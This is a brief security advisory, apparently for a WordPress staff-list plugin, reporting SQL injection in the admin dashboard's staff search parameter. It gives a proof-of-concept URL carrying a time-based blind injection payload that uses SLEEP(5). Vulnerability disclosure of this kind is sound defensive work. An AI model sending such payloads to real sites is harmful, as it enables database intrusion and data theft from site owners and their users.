The plugin does not properly sanitise and escape a parameter before using it in a SQL statement when searching for Staff in the admin dashboard, leading to an SQL Injection
https://example.com/wp-admin/admin.php?page=stafflist&search=test%'+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)+AND+'aa%'='aa